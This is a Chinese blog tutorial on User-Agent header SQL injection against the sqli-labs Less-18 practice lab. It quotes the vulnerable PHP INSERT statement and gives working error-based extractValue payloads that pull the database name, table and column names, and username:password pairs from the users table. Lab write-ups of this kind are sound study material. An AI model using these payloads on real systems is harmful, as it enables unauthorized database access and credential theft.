35岁重学网络安全——SQL注入篇(二十)

最新推荐文章于 2025-04-01 16:00:29 发布
原创 最新推荐文章于 2025-04-01 16:00:29 发布 · 1k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #sql #安全 #sql注入

鲁迅先生曾经说过:做安全,先免责!

用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。

本文主要内容:HTTP头部注入——User-agent注入

HTTP头部注入

在页面中找不到注入点时,可以尝试HTTP头注入。常见的注入位置

  • User-agent注入
  • referer注入
  • cookie注入

User-agent注入

User-Agent简称uagent,中文名为用户代理,简称UA,它是一个特殊字符串头,使服务器可以识别客户端使用的操作系统及其版本、CPU类型、浏览器及其版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

代码审计

古人有云:web安全三步走,一扫二审三放弃。 代码审计可以说是很重要的一步。

打开靶场18节的源码
在这里插入图片描述

看到第73行,对用户输入的用户名和密码进行检查。
在这里插入图片描述

对输入的用户名和密码进行检查的函数。具体检查了三个部分,如下图所示。如果对其中的某些函数不了解,可以自行查阅。
在这里插入图片描述

源码中sql语句部分,可以看到uagent没有做安全检查,直接插入到数据库中。
在这里插入图片描述

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

security.uagents表中插入数据

  • 此表含有三个字段:uagentip_addressusername
  • VALUE()中的三个参数为插入的值

靶场实战

打开Burp suite,抓取数据包,修改报文头中的user-agent字段的值。

需要输入一个正确的用户名和密码,然后单击提交按钮,Burp suite中可以看到截获的数据包。
在这里插入图片描述

Burp suitePRoxy选项卡,在数据包详细内容的空白处单击鼠标右键,然后选择将数据包发送到重发器(即Send to Repeater
在这里插入图片描述

Burp suite中切换到Repeater选项卡中,将User-Agent的内容进行修改。
在这里插入图片描述

在上面有说道,是insert语句中产生的注入,insert语句常常与报错注入结合在一起。
因此,这里使用报错注入。

User-Agent内容:' or extractValue(1,concat('^',(select database()))),2,3) #
在这里插入图片描述

简单说明一下为什么这么构造注入语句。

源代码中的insert语句如下:

在这里插入图片描述

VALUES ('$uagent', '$IP', $uname):括号内带以$符开头的三个参数,在PHP中表示变量,会被用户输入的内容所替换掉。

因此我们要修改VALUES()中的三个值,来实现报错注入。

  • $uagent的值设为',即VALUES(''','$IP', $uname),由于出现多余的单引号,会产生错误,因此使用注释符,即VALUES('' # ','$IP', $uname)#后面的内容无效,变为:VALUES('' #
  • 因为VALUES()需要三个参数,因此写为VALUES('',2,3) #,VALUES需要右括号闭合,因此#前面加上右括号。
  • ''后面跟上报错注入语句:or extractValue(1,concat('^',(select database())))
  • 最终构成:VALUES('' or extractValue(1,concat('^',(select database()))),2,3) #,也就是上面的' or extractValue(1,concat('^',(select database()))),2,3) #的由来。

查询数据表、列名和数据

同理,只要将上面语句中的select database()替换掉即可。

查询表名:' or extractValue(1,concat('^',(select group_concat(table_name) from information_schema.tables where table_schema=(database())))),2,3) #
在这里插入图片描述

查询列名:' or extractValue(1,concat('^',(select group_concat(column_name) from information_schema.columns where table_schema=(database()) and table_name='users'))),2,3) #
在这里插入图片描述

查询数据(报错注入只能显示32个字符,使用substr函数):
' or extractValue(1,concat('^',(select substr(group_concat(username,':',password),1,30) from users))),2,3) #
在这里插入图片描述

无情的广告时间

哈哈哈哈,又到了大家喜欢的广告时间了,公众号:编码魔坊,喜欢的话给个关注呗,点击下方小卡片,扫码即可关注,谢谢您的关注!!!

HTTP请求User-Agent注入、Content-Type注入
墨痕诉清风的博客
02-17 550
User-Agent、Content-Type等只要是http包中存在的都可以进行篡改。在这再说下User-Agent的头注入和Content-Type的头注入
sqli-lab靶场学习(六)——Less18-22(User-Agent、Referer、Cookie注入
sadoshi的专栏
02-11 1198
本关的注入点在User-Agent。我们在用户名和密码框中输入admin/admin后,会回显User-Agent的信息。注意这里只有输入了正确的密码才回回显。PS:如果admin/admin密码不对,就去Less17那里改就行了~~~~我们看一下源码,在less18目录下的index.php:分析代码后,我们发现uagent这个变量获取的是user-agent的数据,而注入点在103行这里,输出页面反馈的在109行。
SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 5732
1. 了解user-agent注入点; 2. 掌握user-agent注入的方法。
sql注入进阶/user-agent/基于报错的注入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 1430
基于user-agent 和报错的盲注
SQL注入漏洞-06】HTTP头部注入靶场实战
cc
02-05 6452
常见的sql注入一般是通过请求参数或者表单进行注入,HTTP头部注入是通过HTTP协议头部字段值进行注入。updatexml()函数回显字符长度有限,先获取用户数量,再逐一获取用户名和密码需要找到注入点 才能够闭合引号的注入参数。
User-Agent(UA)注入
qq_69100706的博客
07-30 837
在CTF(Capture The Flag)竞赛中,User-Agent(UA)注入是一种利用Web应用程序安全漏洞的攻击方式,特别是在应用程序基于User-Agent字符串来执行某些逻辑或数据库查询时。User-Agent注入通常涉及到在HTTP请求头的User-Agent字段中插入恶意SQL代码,以达到控制或操纵应用程序行为的目的。
SQL注入_1-6_user-agent注入
weixin_44110913的博客
12-08 1667
SQL注入_1-6_user-agent注入 一.概念 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 一些网站常常通过判断 UA 来给不同的操作系统、不同的浏览器发送不同的页面,因此可能造成某些页面无法在某个浏览器中正常显示,但通过伪装 UA 可以绕过检测...
35重学网络安全——SQL注入(十六)
Armey的博客
02-10 786
WEB页面只有一个正常页面。利用页面的响应时间,逐步猜解相关信息前提:数据库可以执行命令代码,只是前端页面不会产生任何的反馈信息。
35重学网络安全——SQL注入(十三)
Armey的博客
02-06 899
鲁迅先生曾经说过:做安全,先免责!用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。floor()报错注入基础(get型)
35重学网络安全——SQL注入(十四)
Armey的博客
02-06 503
鲁迅先生曾经说过:做安全,先免责!用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。floor()报错注入实战(get型)
35重学网络安全——SQL注入(九)
Armey的博客
01-28 1079
concat()函数用于连接两个或多个字符串,生成一个新的字符串。利用报错信息,查询当前数据库concat('^',concat()函数解析;,使用()将第二参数包裹是为了优先运算。
35重学网络安全——SQL注入(番外
Armey的博客
01-13 324
感觉这么文章单独发一次,会有些水,所以算作4.1吧本文内容:介绍几个后面实验会用到的工具:hackbarfoxy proxyBurpSuite。
HTTP中User-Agent注入
weixin_53519320的博客
10-28 2058
HTTP中User-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTP中User-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
SQL User-Agent注入详解
永远是少年
08-18 1686
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLUser-Agent注入详解。 一、SQL User-Agent简介 二、SQL User-Agent靶场简介 三、SQL User-Agent注入实战
sql注入之cookie 注入user-agent注入
没有故事
02-27 554
BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入
SOL注入--User-Agent注入
lza20001103的博客
02-27 555
SOL注入--User-Agent注入
MySQL注入user-agent和cookie存在的注入
最新发布
nixiaoge的博客
04-01 897
Web应用程序将用户提供的User-Agent值未经处理直接拼接到SQL查询语句时,攻击者可以通过构造恶意User-Agent值闭合原有SQL语句并注入任意SQL代码。
基于User-Agent注入
weixin_73049307的博客
08-28 958
User-Agent:是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。用较为普通的一点来说,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。这里的错误语句还出现了一串包括IP和账号在内的其他语句,我们可以猜测,系统将该语句拼接到我们注入参数后一并执行。爆出security数据库有emails,referers,uagents,users表,其中users表是我们需要的。爆出数据库名是security。
通过User-agent进行SQL注入
04-09 705
声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 文章来源:https://hackerone.com/reports/297478 我发现了一个SQL注入漏洞/dashboard/datagov/csv_to_json,可以通过User-AgentHTTP请求头利用它。 我没有从数据库中提取任何数据,我已经使用具有算术运算的sleepSQL查询确认了...
SQL注入攻击与防御》——防范网络安全隐患
SQL注入攻击是网络应用安全领域中一个极为重要的安全威胁。这种攻击方式允许攻击者通过在应用程序中输入恶意的SQL语句,从而操纵数据库,获取、修改或删除敏感数据,甚至控制服务器。攻击者可能会利用SQL注入技术来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

道人禅(armey)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值